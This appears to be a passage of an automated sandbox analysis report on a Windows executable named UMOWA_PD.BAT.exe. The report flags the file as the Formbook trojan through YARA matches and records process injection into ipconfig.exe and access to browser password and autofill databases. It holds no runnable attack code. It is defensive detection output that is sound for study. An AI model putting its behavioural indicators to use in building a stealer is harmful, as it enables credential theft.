        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EF177 NtQueryInformationProcess,4_2_030EF177
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_00406C3F0_2_00406C3F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_6FE21BFF0_2_6FE21BFF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C913802_2_33C91380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAE3102_2_33CAE310
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5F3302_2_33D5F330
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8D2EC2_2_33C8D2EC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA51C02_2_33CA51C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E02_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CE717A2_2_33CE717A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6010E2_2_33D6010E
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F1132_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3D1302_2_33D3D130
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAB0D02_2_33CAB0D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D570F12_2_33D570F1
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C900A02_2_33C900A0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D567572_2_33D56757
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA27602_2_33CA2760
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAA7602_2_33CAA760
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5A6C02_2_33D5A6C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5F6F62_2_33D5F6F6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9C6E02_2_33C9C6E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D136EC2_2_33D136EC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA06802_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4D6462_2_33D4D646
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC46702_2_33CC4670
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBC6002_2_33CBC600
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3D62C2_2_33D3D62C
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D575C62_2_33D575C6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5F5C92_2_33D5F5C9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA04452_2_33CA0445
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D14BC02_2_33D14BC0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0B102_2_33CA0B10
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5FB2E2_2_33D5FB2E
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5FA892_2_33D5FA89
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5EA5B2_2_33D5EA5B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5CA132_2_33D5CA13
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9E9A02_2_33C9E9A0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5E9A62_2_33D5E9A6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA28C02_2_33CA28C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D578F32_2_33D578F3
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB68822_2_33CB6882
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C868682_2_33C86868
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5F8722_2_33D5F872
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA98702_2_33CA9870
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB8702_2_33CBB870
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA38002_2_33CA3800
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D408352_2_33D40835
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D51FC62_2_33D51FC6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA6FE02_2_33CA6FE0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5EFBF2_2_33D5EFBF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5FF632_2_33D5FF63
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CACF002_2_33CACF00
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D59ED22_2_33D59ED2
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C92EE82_2_33C92EE8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA1EB22_2_33CA1EB2
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D50EAD2_2_33D50EAD
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC0E502_2_33CC0E50
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D40E6D2_2_33D40E6D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA9DD02_2_33CA9DD0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3FDF42_2_33D3FDF4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB2DB02_2_33CB2DB0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D57D4C2_2_33D57D4C
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0D692_2_33CA0D69
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9AD002_2_33C9AD00
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5FD272_2_33D5FD27
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB8CDF2_2_33CB8CDF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBFCE02_2_33CBFCE0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D39C982_2_33D39C98
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4EC4C2_2_33D4EC4C
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA3C602_2_33CA3C60
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5EC602_2_33D5EC60
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D56C692_2_33D56C69
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C90C122_2_33C90C12
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAAC202_2_33CAAC20
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EF3304_2_032EF330
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0323E3104_2_0323E310
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032213804_2_03221380
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032E124C4_2_032E124C
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0321D2EC4_2_0321D2EC
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032CD1304_2_032CD130
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032F010E4_2_032F010E
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0321F1134_2_0321F113
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0327717A4_2_0327717A
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0324B1E04_2_0324B1E0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032351C04_2_032351C0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032DE0764_2_032DE076
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032200A04_2_032200A0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032E70F14_2_032E70F1
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0323B0D04_2_0323B0D0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032327604_2_03232760
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0323A7604_2_0323A760
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032E67574_2_032E6757
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032CD62C4_2_032CD62C
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0324C6004_2_0324C600
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032546704_2_03254670
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032DD6464_2_032DD646
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032306804_2_03230680
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0322C6E04_2_0322C6E0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032A36EC4_2_032A36EC
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EF6F64_2_032EF6F6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EA6C04_2_032EA6C0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032FA5264_2_032FA526
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EF5C94_2_032EF5C9
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032E75C64_2_032E75C6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032304454_2_03230445
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EFB2E4_2_032EFB2E
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03230B104_2_03230B10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032A4BC04_2_032A4BC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032ECA134_2_032ECA13
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EEA5B4_2_032EEA5B
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0324FAA04_2_0324FAA0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EFA894_2_032EFA89
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0322E9A04_2_0322E9A0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EE9A64_2_032EE9A6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032D08354_2_032D0835
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032338004_2_03233800
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032168684_2_03216868
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032398704_2_03239870
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0324B8704_2_0324B870
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EF8724_2_032EF872
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032A98B24_2_032A98B2
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032468824_2_03246882
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032E78F34_2_032E78F3
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032328C04_2_032328C0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032E18DA4_2_032E18DA
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0323CF004_2_0323CF00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EFF634_2_032EFF63
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EEFBF4_2_032EEFBF
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03236FE04_2_03236FE0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032E1FC64_2_032E1FC6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032D0E6D4_2_032D0E6D
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03250E504_2_03250E50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032E0EAD4_2_032E0EAD
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03231EB24_2_03231EB2
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03222EE84_2_03222EE8
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032E9ED24_2_032E9ED2
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EFD274_2_032EFD27
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0322AD004_2_0322AD00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03230D694_2_03230D69
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032E7D4C4_2_032E7D4C
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03242DB04_2_03242DB0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032CFDF44_2_032CFDF4
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03239DD04_2_03239DD0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0323AC204_2_0323AC20
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03220C124_2_03220C12
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03233C604_2_03233C60
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032E6C694_2_032E6C69
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032EEC604_2_032EEC60
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032DEC4C4_2_032DEC4C
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032C9C984_2_032C9C98
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0324FCE04_2_0324FCE0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032FACEB4_2_032FACEB
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03248CDF4_2_03248CDF
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EF1774_2_030EF177
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EE3274_2_030EE327
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F53D44_2_030F53D4
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030ECAF34_2_030ECAF3
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030ED8484_2_030ED848
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EE7E34_2_030EE7E3
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EE4454_2_030EE445
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: String function: 33CE7BE4 appears 78 times
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: String function: 33C8B910 appears 241 times
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: String function: 33D0E692 appears 73 times
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: String function: 33CD5050 appears 34 times
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: String function: 33D1EF10 appears 98 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 03265050 appears 35 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 032AEF10 appears 105 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0321B910 appears 266 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 03277BE4 appears 88 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0329E692 appears 84 times
        Source: UMOWA_PD.BAT.exe, 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenygifte.exe4 vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000003.15298219117.0000000033A1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000003.15301885907.0000000033BD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000000.15099477242.000000000044C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenygifte.exe4 vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033F30000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exeBinary or memory string: OriginalFilenamenygifte.exe4 vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/10@17/12
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_00404991 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404991
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004021AF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeFile created: C:\Users\user\polaritetsJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeFile created: C:\Users\user\AppData\Local\Temp\nsbFD8B.tmpJump to behavior
        Source: UMOWA_PD.BAT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: ipconfig.exe, 00000004.00000002.19064432079.0000000007D74000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15574993726.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
        Source: ipconfig.exe, 00000004.00000003.15567298333.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19059845738.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15573540125.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15567599300.0000000002C0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: ipconfig.exe, 00000004.00000002.19064432079.0000000007DC6000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064432079.0000000007DDA000.00000004.00000020.00020000.00000000.sdmp, -11EqE.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeFile read: C:\Users\user\Desktop\UMOWA_PD.BAT.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\UMOWA_PD.BAT.exe "C:\Users\user\Desktop\UMOWA_PD.BAT.exe"
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeProcess created: C:\Users\user\Desktop\UMOWA_PD.BAT.exe "C:\Users\user\Desktop\UMOWA_PD.BAT.exe"
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeProcess created: C:\Users\user\Desktop\UMOWA_PD.BAT.exe "C:\Users\user\Desktop\UMOWA_PD.BAT.exe"Jump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: propsys.dllJump to behavior
